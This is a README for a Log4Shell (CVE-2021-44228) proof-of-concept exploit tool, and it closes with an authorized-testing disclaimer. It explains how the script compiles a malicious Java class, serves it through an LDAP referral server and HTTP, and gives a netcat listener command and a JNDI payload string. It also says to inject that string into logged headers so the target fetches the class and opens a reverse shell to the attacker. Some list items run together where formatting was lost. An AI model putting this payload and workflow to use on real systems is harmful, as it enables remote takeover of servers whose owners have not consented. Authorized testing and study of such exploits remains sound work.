
A Proof-Of-Concept for the CVE-2021-44228 vulnerability.
Proof-of-concept exploit for the Log4j vulnerability (CVE-2021-44228), also known as Log4Shell. This tool generates a malicious Java class, starts an LDAP referral server, and serves the payload over HTTP, allowing a remote attacker to execute arbitrary commands on a vulnerable target.
poc.py:
jdk1.8.0_20/ – a copy of Oracle JDK 1.8.0_20 (contains bin/javac and bin/java). If missing, the script will attempt to use the system's javac and java commands.target/marshalsec-0.0.3-SNAPSHOT-all.jar – the marshalsec JAR file used to start the LDAP server.jdk1.8.0_20 folder and the marshalsec JAR as described above.pip install -r requirements.txt
Run the script with Python:
python3 poc.py [OPTIONS]
| Argument | Type | Default | Description |
|---|---|---|---|
--userip | string | auto-detected IPv4 | IP address that the LDAP and HTTP servers will bind to and advertise. This must be reachable from the target machine. |
--webport | integer | 8000 | Port for the HTTP server that serves the compiled Exploit.class. |
--lport | integer | 9001 | Port where your netcat listener waits for the reverse shell. The payload will connect back to userip:lport. |
Start a netcat listener on your attacker machine (replace 9001 with your chosen port):
nc -lvnp 9001
Run the exploit:
python3 poc.py --userip 192.168.1.10 --webport 8080 --lport 9001
If you omit --userip, the script will automatically use your machine's primary IPv4 address.
The script will display a payload string to inject into the vulnerable target, for example:
${jndi:ldap://192.168.1.10:1389/a}
Inject this string into any input field or HTTP header that is logged by a vulnerable Log4j instance (e.g., User-Agent, X-Forwarded-For, etc.). The target will connect to the LDAP server, fetch the malicious class from the HTTP server, and execute the reverse shell.
You should see a shell connection appear in your netcat listener.
Exploit.java containing code that opens a reverse shell to userip:lport.javac).webport to host the compiled Exploit.class./bin/sh and is intended for Unix-like target systems. For Windows targets, you would need to modify the command inside Exploit.java.webport and lport), and that the target can reach your machine.The script automatically removes Exploit.java and Exploit.class when it exits (either normally or after a KeyboardInterrupt). If you need to keep the files for debugging, comment out the finally block in poc.py.
This tool is intended for educational and authorized security testing purposes only. Unauthorized use of this exploit against systems you do not own or have explicit permission to test is illegal. The authors are not responsible for any misuse or damage caused by this software.